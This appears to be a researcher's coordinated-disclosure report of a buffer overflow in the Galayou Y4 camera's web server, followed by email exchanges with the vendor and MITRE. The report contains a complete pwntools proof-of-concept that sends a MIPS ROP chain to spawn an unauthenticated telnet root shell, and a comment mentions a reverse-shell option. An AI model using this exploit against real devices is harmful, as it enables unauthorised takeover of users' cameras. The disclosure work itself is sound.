| Description | Vulnerability Summary:
- Product: Galayou Y4 (Firmware V1.0.0)
- Component: Web Server (HTTP)
- Vulnerability Type: Buffer Overflow
- Severity: Critical
- Impact: This vulnerability allows an unauthenticated attacker on the same network to execute arbitrary code on the device.
Below is a beautiful proof of concept and communication with the vendor, where the issue is acknowledged and a fix is promised.
I gave them a deadline until June 5th. It would be nice to already get the cve reserved for this :)
I previously tried getting a cve with Mitre but was ignored for 2 months, so i withdrew. Withdrawal email is attached at the end!
PROOF OF CONCEPT (working 100% of the times i tried it):
#!/usr/bin/env python3
import socket
from pwn import *
import sys
context.arch = 'mips'
context.endian = 'little'
context.bits = 32
context.os = 'linux'
TARGET_IP = "127.0.0.1" # placeholder
TARGET_PORT = 80
gadget = 0x004213e4 # addiu a0, sp, 0x28; move t9, s1; jalr t9;
hy_system = 0x006cc060 # hy_system PLT
valid_ptr = 0x006aaf84 # contains 0x00544547 ("GET\x00")
payload = fit({
# cgi handler needs a valid string pointer to not crash
7328: p32(valid_ptr),
# registers for ropchain
7348: p32(hy_system), # s1 becomes t9
7380: p32(gadget), # ra/gets written to ra
# command string starting telnetd. could also open a reverse shell since rtty is installed!
7384 + 0x28: b"telnetd -l /bin/sh -p 23 &\x00", # sp+40 becomes a0
}, filler=b'A')
# 0x0058025c(parse_webserver_requests) parses the request type and length with no check
# and calls 0x0057f3c4 to receive the body
# the body is copied onto a buffer on the stack (body_buffer)
req = flat(
b"POST /hack HTTP/1.1\r\n",
b"Host: ",
TARGET_IP.encode(),
b"\r\n",
b"Content-Length: ",
str(len(payload)).encode(),
b"\r\n",
b"\r\n",
payload,
)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(15)
s.connect((TARGET_IP, TARGET_PORT))
s.sendall(req)
try:
out = s.recv(1024) # Try to receive something to check if the connection is still alive
info(f"response: {out}")
except socket.timeout:
info("no response")
s.close()
except Exception as e:
error(f"error: {e}")
sleep(10) # give it some time to spawn telnetd
io = remote(TARGET_IP, 23)
io.sendline(b"uname")
if io.recvline(timeout=10):
success("RCE!")
io.interactive() # shell
else:
error("No response from telnet, exploit might have failed.")
COMMUNICATION WITH MANUFACTURER in french (incl. acknowledgement of issue):
Bonjour stringvalidation,
Merci pour votre retour et pour le signalement détaillé des vulnérabilités.
Nous comprenons l'importance de votre découverte et tenons à vous rassurer : bien que notre équipe technique ne puisse pas être contactée directement pour des questions de support, vos informations ont bien été transmises à notre équipe de sécurité et elles seront examinées avec attention.
Notre équipe nous a confirmé que, lors de la transition vers le système P2P, le service HTTP sera désactivé, ce qui permettra de corriger ce type de vulnérabilité.
Nous comprenons que cela puisse vous inquiéter et nous nous excusons pour la gêne occasionnée. Soyez assuré(e) que nous faisons tout notre possible pour assurer la sécurité de nos utilisateurs et de nos produits.
Nous vous remercions encore pour votre vigilance et votre coopération.
Cordialement,
Lene
Équipe service client Galayou
发件人:stringvalidation <[email protected]>
发送日期:2026-03-12 19:54:08
收件人:"[email protected]" <[email protected]>
主题:Re: Galayou | Responsible Disclosure - Remote Code Execution on Galayou Y4
Hide original message
> Re-Bonjour Lene,
>
> Pour compléter mon message précédent, je souhaite également signaler une seconde vulnérabilité sur ce même serveur web HTTP: un déni de service (DoS).
>
> Le crash se produit lors de l'envoi d'une requête vers le chemin /media/segments/. La cause profonde est une conversion de type signé vers non signé (cast from signed to unsigned) lors de l'utilisation de strcpy.
>
> Bien que vous passiez au système P2P, je préfère vous le signaler officiellement afin que l'équipe technique s'assure que ce code vulnérable est bien supprimé du nouveau firmware.
>
> Merci de leur transmettre ces détails.
>
> Cordialement,
> StringValidation
> On Thursday, March 12th, 2026 at 11:50 AM, stringvalidation <[email protected]> wrote:
>
> > Bonjour Lene,
> > Merci pour cette mise à jour et pour avoir transmis les informations à l'équipe technique. C'est une excellente nouvelle que la transition vers une solution P2P soit déjà en phase de test.
> >
> > Cependant, le ticket n'est pas encore résolu de mon côté.
> > Étant donné qu'il s'agit d'une divulgation responsable de vulnérabilité (Responsible Disclosure), je prévois de demander l'attribution d'un identifiant CVE (Common Vulnerabilities and Exposures) auprès de MITRE pour cette découverte. >
> > Pourriez-vous me mettre en contact direct avec l'équipe technique ou l'équipe de sécurité ? Cela nous permettra de coordonner la publication de ce CVE avec le déploiement de votre correctif (la nouvelle version P2P), afin de ne pas exposer vos utilisateurs avant que la mise à jour ne soit disponible.
> >
> > Dans l'attente de votre retour!
> > Cordialement,
> > StringValidation
> > On Thursday, March 12th, 2026 at 7:04 AM, [email protected] <[email protected]> wrote:
> >
> > > Bonjour stringvalidation,
> > >
> > > Merci pour votre retour et pour votre signalement.
> > >
> > > Nous avons transmis votre problème à notre équipe technique. Leur retour est le suivant :
> > > Actuellement, la lecture des vidéos sur la carte TF se fait via un serveur web intégré à l’appareil. L’application utilise le protocole HTTP pour accéder aux fichiers vidéo et permettre la lecture. Pour améliorer la sécurité et la performance, nous prévoyons de passer à une solution P2P. La nouvelle version avec ce système P2P a déjà été développée et est en phase de test et d’ajustement.
> > >
> > > Nous vous remercions pour votre patience et votre compréhension pendant que nous travaillons à l’amélioration du service.
> > >
> > > Si le problème est résolu, merci de répondre « OK ».
> > >
> > > Cordialement,
> > > Lene
> > > Équipe Service Client Galayou
> > >
> > > > On 周六, 3月 7, 2026, at 12:43 中午 <[email protected]> ;wrote:
> > > >
> > > > Hello,
> > > >
> > > > I am writing to report a critical security vulnerability in the Galayou Y4 Camera (Firmware V1.0.0).
> > > >
> > > > Vulnerability Summary:
> > > > - Product: Galayou Y4 (Firmware V1.0.0)
> > > > - Component: Web Server (HTTP)
> > > > - Vulnerability Type: Buffer Overflow
> > > > - Severity: Critical
> > > > - Impact: This vulnerability allows an unauthenticated attacker on the same network to execute arbitrary code on the device.
> > > >
> > > > To ensure swift action and safe disclosure, I kindly request that you respond to this email within 7 days using my attached PGP key, so I can share:
> > > > - Technical analysis
> > > > - proof of concept
> > > > - Mitigation steps
> > > >
> > > > Thank you for your prompt attention to this matter and for prioritizing the security of your products and customers!
> > > > ~StringValidation
MY LATEST EMAIL TO THEM (has no respone yet):
Bonjour Lene,
Je vous contacte pour faire un suivi sur la vulnérabilité signalée le 7 mars concernant le service HTTP.
Étant donné que plus de deux mois se sont écoulés, je prévois de publier mes recherches et de demander l'attribution d'un identifiant CVE officiel d'ici le 5 juin, conformément aux standards de l'industrie (délai de divulgation de 90 jours).
Pourriez-vous me confirmer si la mise à jour vers le système P2P a déjà été déployée, afin que je puisse l'indiquer correctement dans mon rapport public ?
Cordialement,
stringvalidation
WITHDRAWAL FROM MITRE:
Hello,
I am writing to formally withdraw my request for a CVE ID assignment under this request number: Request 2006007.
Due to the need to proceed with a strict 90-day Coordinated Vulnerability Disclosure (CVD) timeline ending on June 5th, I am moving this submission to an alternative, authorized CNA.
Please close this ticket and update your records to reflect that this request has been officially withdrawn so that it does not conflict with the new CNA's assignment process.
Thank you for your time!
~stringvalidation
> On Thursday, March 12th, 2026 at 1:27 PM, Cherwell Service Management (DEV) <[email protected]> wrote:
>
> > Thank you for your CVE Program request. It will be reviewed by a CVE Assignment Team member.
> >
> > Changes, additions, or updates to your request can be sent to the CVE Team by replying directly to this email.
> > Please do not change the subject line, which allows us to effectively track your request.
> >
> > CVE Assignment Team
> >
> > M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
> >
> > [A PGP key is available for encrypted communications at https://www.cve.org/ResourcesSupport/FAQs]
> >
> > {CMI: MCID15668208} |
|---|